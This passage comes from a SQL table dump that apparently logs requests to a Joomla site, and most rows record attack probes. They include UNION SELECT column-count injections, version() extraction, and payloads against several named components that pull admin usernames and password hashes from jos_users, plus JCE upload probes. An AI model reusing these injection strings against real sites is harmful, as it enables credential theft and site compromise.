CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,','','','',1,0,'2015-12-31 23:34:56','0000-00-00 00:00:00'),(220,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111\" UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by \"as /*','','','',1,0,'2015-12-31 23:35:25','0000-00-00 00:00:00'),(221,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /* order by \"as /*','','','',1,0,'2015-12-31 23:35:26','0000-00-00 00:00:00'),(222,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /* order by \"as /*','','','',1,0,'2015-12-31 23:35:27','0000-00-00 00:00:00'),(223,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /* order by \"as /*','','','',1,0,'2015-12-31 23:35:28','0000-00-00 00:00:00'),(224,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /* order by \"as /*','','','',1,0,'2015-12-31 23:35:29','0000-00-00 00:00:00'),(225,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45) -- /* order ','','','',1,0,'2015-12-31 23:35:30','0000-00-00 00:00:00'),(226,'http://www.fitoman.com/index.php/component/content/article?id=1331111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,','','','',1,0,'2015-12-31 23:35:31','0000-00-00 00:00:00'),(227,'http://www.fitoman.com/index.php/component/content/article?id=133999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2015-12-31 23:37:03','0000-00-00 00:00:00'),(228,'http://www.fitoman.com/index.php/component/content/article?id=13399999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',1,0,'2015-12-31 23:37:24','0000-00-00 00:00:00'),(229,'http://www.fitoman.com/index.php/component/content/article?id=13399999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2015-12-31 23:37:25','0000-00-00 00:00:00'),(230,'http://fitoman.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload','','','',2,0,'2016-01-21 05:13:47','0000-00-00 00:00:00'),(231,'http://fitoman.com/index.php?option=com_user&task=register','','','',2,0,'2016-01-21 15:56:52','0000-00-00 00:00:00'),(232,'http://www.fitoman.com/index.php/user-registration','','','',1,0,'2016-01-22 17:42:30','0000-00-00 00:00:00'),(233,'http://www.fitoman.com/index.php?option=com_kunena','','','',5,0,'2016-01-23 12:48:18','0000-00-00 00:00:00'),(234,'http://fitoman.com/index.php?option=com_user&view=login','','http://fitoman.com/index.php?option=com_user&view=login','',1,0,'2016-01-30 20:16:28','0000-00-00 00:00:00'),(235,'http://fitoman.com/index.php?option=com_user&view=user&task=edit','','http://fitoman.com','',1,0,'2016-01-30 20:16:32','0000-00-00 00:00:00'),(236,'http://www.fitoman.com/index.php/cache/pdf.php','','','',13,0,'2016-02-08 18:39:34','0000-00-00 00:00:00'),(237,'http://www.fitoman.com/index.php?option=anyrandomurl2636','','http://www.fitoman.com/index.php?option=anyrandomurl2636','',1,0,'2016-02-10 16:55:50','0000-00-00 00:00:00'),(238,'http://www.fitoman.com/index.php?option=com_user&view=login','','http://www.fitoman.com/index.php?option=com_user&view=login','',1,0,'2016-02-10 16:55:50','0000-00-00 00:00:00'),(239,'http://www.fitoman.com/index.php?option=com_agora','','http://www.fitoman.com/index.php?option=com_agora','',4,0,'2016-02-11 09:14:16','0000-00-00 00:00:00'),(240,'http://www.fitoman.com/index.php?option=com_community&view=frontpage','','http://www.fitoman.com/index.php?option=com_community&view=frontpage','',2,0,'2016-02-11 09:14:16','0000-00-00 00:00:00'),(241,'http://www.fitoman.com/index.php?option=com_k2&view=itemlist&task=date','','http://www.fitoman.com/index.php?option=com_k2&view=itemlist&task=date','',2,0,'2016-02-11 09:14:17','0000-00-00 00:00:00'),(242,'http://www.fitoman.com/index.php?option=com_easyblog&view=latest','','http://www.fitoman.com/index.php?option=com_easyblog&view=latest','',2,0,'2016-02-11 09:14:17','0000-00-00 00:00:00'),(243,'http://www.fitoman.com/index.php?option=com_vitabook&view=vitabook','','http://www.fitoman.com/index.php?option=com_vitabook&view=vitabook','',2,0,'2016-02-11 09:14:18','0000-00-00 00:00:00'),(244,'http://www.fitoman.com/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1','','http://www.fitoman.com/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1','',2,0,'2016-02-11 09:14:18','0000-00-00 00:00:00'),(245,'http://www.fitoman.com/index.php?option=com_ccboard&view=forumlist','','http://www.fitoman.com/index.php?option=com_ccboard&view=forumlist','',2,0,'2016-02-11 09:14:18','0000-00-00 00:00:00'),(246,'http://www.fitoman.com/index.php?option=com_kunena&view=category&layout=list','','http://www.fitoman.com/index.php?option=com_kunena&view=category&layout=list','',2,0,'2016-02-11 09:14:18','0000-00-00 00:00:00'),(247,'http://fitoman.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form','','','',4,0,'2016-02-21 19:09:24','0000-00-00 00:00:00'),(248,'http://fitoman.com/index.php?option=com_tag&task=tag&lang=es&tag=999999.9\'+union+all+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e)+from+jos_users+where+gid=24+limit+0,1--+a','','','',2,0,'2016-02-25 14:30:42','0000-00-00 00:00:00'),(249,'http://fitoman.com/index.php?option=com_tag&task=tag&lang=es&tag=999999.9\'+union+all+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e)+from+jos_users+where+gid=25+limit+0,1--+a','','','',2,0,'2016-02-25 14:30:45','0000-00-00 00:00:00'),(250,'http://fitoman.com/index.php?option=com_fireboard&Itemid=0&id=1&catid=0&func=fb_pdf\'','','','',2,0,'2016-03-02 12:29:12','0000-00-00 00:00:00'),(251,'http://www.fitoman.com/index.php/component/content/article?id=1392121121121212.1','','','',1,0,'2016-03-02 21:29:49','0000-00-00 00:00:00'),(252,'http://fitoman.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b','','','',1,0,'2016-03-03 09:20:24','0000-00-00 00:00:00'),(253,'http://fitoman.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20','','','',1,0,'2016-03-03 09:20:46','0000-00-00 00:00:00'),(254,'http://fitoman.com/?option=com_user&view=register','','','',2,0,'2016-03-04 20:15:49','0000-00-00 00:00:00'),(255,'http://www.fitoman.com/index.php/component/user/?task=register','','http://www.fitoman.com/index.php?option=com_user&view=register','',1,0,'2016-03-09 19:03:50','0000-00-00 00:00:00'),(256,'https://www.fitoman.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form','','','',2,0,'2016-03-20 14:44:31','0000-00-00 00:00:00'),(257,'http://fitoman.com/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10+from+jos_users+where+gid=24+limit+0,1--','','','',2,0,'2016-03-21 08:58:52','0000-00-00 00:00:00'),(258,'http://fitoman.com/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10+from+jos_users+where+gid=25+limit+0,1--','','','',2,0,'2016-03-21 08:59:32','0000-00-00 00:00:00'),(259,'http://fitoman.com/index.php?option=com_agora','','','',3,0,'2016-03-21 20:49:25','0000-00-00 00:00:00'),(260,'http://www.fitoman.com/index.php/services/ipo-manager\'A=0','','http://www.fitoman.com/index.php/services/ipo-manager\'A=0','',2,0,'2016-03-26 17:19:17','0000-00-00 00:00:00'),(261,'http://fitoman.com/index.php?option=com_kunena&func=userlist&search=\'+and+1=2)+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users+where+gid=24+limit+0,1--+;','','','',2,0,'2016-03-28 08:49:25','0000-00-00 00:00:00'),(262,'http://fitoman.com/index.php?option=com_kunena&func=userlist&search=\'+and+1=2)+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users+where+gid=25+limit+0,1--+;','','','',2,0,'2016-03-28 08:49:27','0000-00-00 00:00:00'),(263,'http://fitoman.com/index.php?option=com_muscol&view=artists&letter=1\"+and+1=0+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users+where+gid=24+limit+0','','','',1,0,'2016-03-30 14:13:41','0000-00-00 00:00:00'),(264,'http://fitoman.com/index.php?option=com_muscol&view=artists&letter=1\"+and+1=0+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users+where+gid=25+limit+0','','','',1,0,'2016-03-30 14:14:20','0000-00-00 00:00:00'),(265,'http://fitoman.com/?view=videos&type=member&user_id=1 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),14,15,16,17,18,19,20,21,22,23,24,25,26,27 from+jos_users+where+gid=24+','','','',1,0,'2016-03-30 21:54:15','0000-00-00 00:00:00'),(266,'http://fitoman.com/?view=videos&type=member&user_id=1 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),14,15,16,17,18,19,20,21,22,23,24,25,26,27 from+jos_users+where+gid=25+','','','',1,0,'2016-03-30 21:54:57','0000-00-00 00:00:00'),(267,'http://fitoman.com/index.php?view=videos&type=member&user_id=66+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users+where+','','','',1,0,'2016-03-30 23:20:21','0000-00-00 00:00:00'),(268,'http://www.fitoman.com/index.php/component/content/article?id=1192121121121212.1','','','',1,0,'2016-04-14 05:53:09','0000-00-00 00:00:00'),(269,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111 UNION SELECT CHAR(45,120,49,45,81,45) -- /*','','','',1,0,'2016-04-14 05:56:10','0000-00-00 00:00:00'),(270,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /*','','','',1,0,'2016-04-14 05:56:11','0000-00-00 00:00:00'),(271,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /*','','','',1,0,'2016-04-14 05:56:11','0000-00-00 00:00:00'),(272,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /*','','','',1,0,'2016-04-14 05:56:12','0000-00-00 00:00:00'),(273,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /*','','','',1,0,'2016-04-14 05:56:12','0000-00-00 00:00:00'),(274,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45) -- /*','','','',1,0,'2016-04-14 05:56:13','0000-00-00 00:00:00'),(275,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,5','','','',1,0,'2016-04-14 05:56:13','0000-00-00 00:00:00'),(276,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111\' UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by \'as /*','','','',1,0,'2016-04-14 05:56:26','0000-00-00 00:00:00'),(277,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /* order by \'as /*','','','',1,0,'2016-04-14 05:56:27','0000-00-00 00:00:00'),(278,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /* order by \'as /*','','','',1,0,'2016-04-14 05:56:28','0000-00-00 00:00:00'),(279,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /* order by \'as /*','','','',1,0,'2016-04-14 05:56:28','0000-00-00 00:00:00'),(280,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /* order by \'as /*','','','',1,0,'2016-04-14 05:56:29','0000-00-00 00:00:00'),(281,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45) -- /* order ','','','',1,0,'2016-04-14 05:56:29','0000-00-00 00:00:00'),(282,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,','','','',1,0,'2016-04-14 05:56:30','0000-00-00 00:00:00'),(283,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111\" UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by \"as /*','','','',1,0,'2016-04-14 05:56:44','0000-00-00 00:00:00'),(284,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /* order by \"as /*','','','',1,0,'2016-04-14 05:56:44','0000-00-00 00:00:00'),(285,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /* order by \"as /*','','','',1,0,'2016-04-14 05:56:45','0000-00-00 00:00:00'),(286,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /* order by \"as /*','','','',1,0,'2016-04-14 05:56:45','0000-00-00 00:00:00'),(287,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /* order by \"as /*','','','',1,0,'2016-04-14 05:56:46','0000-00-00 00:00:00'),(288,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45) -- /* order ','','','',1,0,'2016-04-14 05:56:46','0000-00-00 00:00:00'),(289,'http://www.fitoman.com/index.php/component/content/article?id=1191111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,','','','',1,0,'2016-04-14 05:56:47','0000-00-00 00:00:00'),(290,'http://www.fitoman.com/index.php/component/content/article?id=119999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2016-04-14 05:57:54','0000-00-00 00:00:00'),(291,'http://www.fitoman.com/index.php/component/content/article?id=11999999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',1,0,'2016-04-14 05:58:12','0000-00-00 00:00:00'),(292,'http://www.fitoman.com/index.php/component/content/article?id=11999999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2016-04-14 05:58:13','0000-00-00 00:00:00'),(293,'http://fitoman.com/index.php?option=com_kunena','','','',1,0,'2016-04-28 09:11:20','0000-00-00 00:00:00'),(294,'http://www.fitoman.com/index.php?option=com_qcontacts&view=category&catid=0','','','',1,0,'2016-05-01 06:44:59','0000-00-00 00:00:00'),(295,'http://fitoman.com/index.php?option=com_ccboard','','','',1,0,'2016-05-04 08:54:09','0000-00-00 00:00:00'),(296,'http://www.fitoman.com/index.php/component/content/article?id=1362121121121212.1','','','',1,0,'2016-05-08 22:31:41','0000-00-00 00:00:00'),(297,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /*','','','',1,0,'2016-05-08 22:37:04','0000-00-00 00:00:00'),(298,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /*','','','',1,0,'2016-05-08 22:37:05','0000-00-00 00:00:00'),(299,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /*','','','',1,0,'2016-05-08 22:37:05','0000-00-00 00:00:00'),(300,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /*','','','',1,0,'2016-05-08 22:37:06','0000-00-00 00:00:00'),(301,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45) -- /*','','','',1,0,'2016-05-08 22:37:06','0000-00-00 00:00:00'),(302,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,5','','','',1,0,'2016-05-08 22:37:07','0000-00-00 00:00:00'),(303,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111\' UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by \'as /*','','','',1,0,'2016-05-08 22:37:18','0000-00-00 00:00:00'),(304,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /* order by \'as /*','','','',1,0,'2016-05-08 22:37:19','0000-00-00 00:00:00'),(305,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /* order by \'as /*','','','',1,0,'2016-05-08 22:37:19','0000-00-00 00:00:00'),(306,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /* order by \'as /*','','','',1,0,'2016-05-08 22:37:20','0000-00-00 00:00:00'),(307,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /* order by \'as /*','','','',1,0,'2016-05-08 22:37:21','0000-00-00 00:00:00'),(308,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45) -- /* order ','','','',1,0,'2016-05-08 22:37:21','0000-00-00 00:00:00'),(309,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,','','','',1,0,'2016-05-08 22:37:22','0000-00-00 00:00:00'),(310,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111\" UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by \"as /*','','','',1,0,'2016-05-08 22:37:33','0000-00-00 00:00:00'),(311,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /* order by \"as /*','','','',1,0,'2016-05-08 22:37:34','0000-00-00 00:00:00'),(312,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /* order by \"as /*','','','',1,0,'2016-05-08 22:37:34','0000-00-00 00:00:00'),(313,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /* order by \"as /*','','','',1,0,'2016-05-08 22:37:35','0000-00-00 00:00:00'),(314,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /* order by \"as /*','','','',1,0,'2016-05-08 22:37:35','0000-00-00 00:00:00'),(315,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45) -- /* order ','','','',1,0,'2016-05-08 22:37:36','0000-00-00 00:00:00'),(316,'http://www.fitoman.com/index.php/component/content/article?id=1361111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,','','','',1,0,'2016-05-08 22:37:37','0000-00-00 00:00:00'),(317,'http://www.fitoman.com/index.php/component/content/article?id=136999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2016-05-08 22:38:31','0000-00-00 00:00:00'),(318,'http://www.fitoman.com/index.php/component/content/article?id=13699999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',1,0,'2016-05-08 22:38:49','0000-00-00 00:00:00'),(319,'http://www.fitoman.com/index.php/component/content/article?id=13699999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2016-05-08 22:38:49','0000-00-00 00:00:00'),(320,'http://fitoman.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743','','','',1,0,'2016-05-12 16:40:28','0000-00-00 00:00:00'),(321,'http://fitoman.com/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',6,0,'2016-05-12 16:43:07','0000-00-00 00:00:00'),(322,'http://www.fitoman.com/index.php?option=com_easyblog','','','',1,0,'2016-05-17 21:04:50','0000-00-00 00:00:00'),(323,'http://WWW.FITOMAN.COM/index.php/services/portfoliomanagement,','','http://www.google.com/url?url=WWW.FITOMAN.COM&yahoo.com','',1,0,'2016-05-21 01:06:40','0000-00-00 00:00:00'),(324,'http://fitoman.com/index.php/login-form','','','',1,0,'2016-05-21 07:34:48','0000-00-00 00:00:00'),(325,'http://fitoman.com/index.php/login','','','',3,0,'2016-05-21 07:34:49','0000-00-00 00:00:00'),(326,'http://fitoman.com/index.php/register','','','',1,0,'2016-05-21 07:34:50','0000-00-00 00:00:00'),(327,'http://fitoman.com/index.php/log-out','','','',1,0,'2016-05-21 07:34:51','0000-00-00 00:00:00'),(328,'http://fitoman.com/index.php/using-joomla/extensions/components/users-component/login-form','','','',1,0,'2016-05-21 07:34:56','0000-00-00 00:00:00'),(329,'http://www.fitoman.com/index.php/component/content/article?id=1322121121121212.1','','','',1,0,'2016-06-13 11:10:03','0000-00-00 00:00:00'),(330,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111 UNION SELECT CHAR(45,120,49,45,81,45) -- /*','','','',1,0,'2016-06-13 11:12:08','0000-00-00 00:00:00'),(331,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /*','','','',1,0,'2016-06-13 11:12:09','0000-00-00 00:00:00'),(332,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /*','','','',1,0,'2016-06-13 11:12:09','0000-00-00 00:00:00'),(333,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /*','','','',1,0,'2016-06-13 11:12:09','0000-00-00 00:00:00'),(334,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /*','','','',1,0,'2016-06-13 11:12:10','0000-00-00 00:00:00'),(335,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45) -- /*','','','',1,0,'2016-06-13 11:12:10','0000-00-00 00:00:00'),(336,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,5','','','',1,0,'2016-06-13 11:12:11','0000-00-00 00:00:00'),(337,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111\' UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by \'as /*','','','',1,0,'2016-06-13 11:12:19','0000-00-00 00:00:00'),(338,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /* order by \'as /*','','','',1,0,'2016-06-13 11:12:19','0000-00-00 00:00:00'),(339,'http://www.fitoman.com/index.php/component/content/article?id=1321111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /* order by \'as /*','','','',1,0,'2016-06-13 11:12:20','0000-00-00 